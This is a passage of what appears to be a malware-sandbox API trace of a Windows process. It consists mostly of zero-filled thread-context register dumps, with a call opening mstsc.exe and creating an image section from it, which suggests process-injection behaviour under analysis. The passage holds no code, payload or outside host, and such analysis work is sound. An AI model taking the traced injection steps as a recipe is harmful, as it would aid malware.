[22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.528] NtOpenFile (in: FileHandle=0x18f620, DesiredAccess=0x1, ObjectAttributes=0x3871420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\syswow64\\mstsc.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x3871400, ShareAccess=0x1, OpenOptions=0x0 | out: FileHandle=0x18f620*=0x12c, IoStatusBlock=0x3871400*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.533] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.537] NtCreateSection (in: SectionHandle=0x18f61c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x12c | out: SectionHandle=0x18f61c*=0x128) returned 0x0 [0107.540] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, 